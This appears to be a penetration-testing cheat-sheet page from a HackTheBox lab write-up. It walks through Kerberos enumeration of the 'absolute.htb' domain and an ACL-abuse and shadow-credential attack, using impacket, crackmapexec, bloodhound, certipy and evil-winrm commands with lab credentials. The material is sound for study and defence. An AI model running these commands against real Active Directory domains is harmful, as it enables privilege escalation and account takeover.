Kerberos based Enum and Attack Samples

ACL Abuse and Shadow Credential

Preparation

# Get TGT for a user
impacket-getTGT 'absolute.htb/d.klay:Darkmoonsky248girl' -dc-ip $RHOST

# Inject it into memory 
export KRB5CCNAME=./d.klay.ccache

Enumeration

LDAP

crackmapexec ldap dc.absolute.htb --use-kcache --users

SMB

crackmapexec smb dc.absolute.htb --use-kcache --shares

Bloodhound

bloodhound.py -k -u m.lovegod -p AbsoluteLDAP2022! --auth-method kerberos -d absolute.htb -dc dc.absolute.htb -ns 10.129.228.64 --dns-tcp --zip -c All

Exploitation - ACL Abuse and Shadow Credential

Get a Bloodhound result below. The m.lovegod owns the Network Audit group, which has GenericWrite on the winrm_user user.

To get access to the machine, I’ll first I’ll need to give m.lovegod write access on the Network Audit group. Then I can add m.lovegod to the group. Finally, I can use those permissions to create a shadow credential for the winrm_user account to access to the machine via evil_winrm.

Update the ownership of the user to add a 'write permission'.

# Domain: absolute.htb
# User: m.lovegod
# Group: Network Audit
# Action: give write permission

python3 /opt/python/impacket/impacket/examples/owneredit.py -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -new-owner m.lovegod -target 'Network Audit' -action write

Add the full control of Group to the user.

# Domain: absolute.htb
# User: m.lovegod
# Group: Network Audit
# Action: give write permission
# Right: FullControl

python3 /opt/python/impacket_porgs/impacket/examples/dacledit.py -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -principal m.lovegod -target "Network Audit" -action write -rights FullControl

Add the user to the group.

# Domain: absolute.htb
# User: m.lovegod
# Group: Network Audit
Kali> kinit m.lovegod
Kali> net rpc group addmem "Network Audit" -U 'm.lovegod' -k -S dc.absolute.htb m.lovegod

# or 
Kali> net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb

Create a Shadow Credential.

# Let's find ADCS environment. You will see some ADCS configurations. 
KRB5CCNAME=./d.klay.ccache  certipy find -username m.lovegod@absolute.htb -k -target dc.absolute.htb 

# Let's add the shadow credential to the winrm_user user 
KRB5CCNAME=./d.klay.ccache certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb 

# Let's connect to the machine
KRB5CCNAME=./winrm_user.ccache evil-winrm -i dc.absolute.htb -r absolute.htb

PreviousOverpass-the-hash Attack NextSilver Ticket

Last updated 2 years ago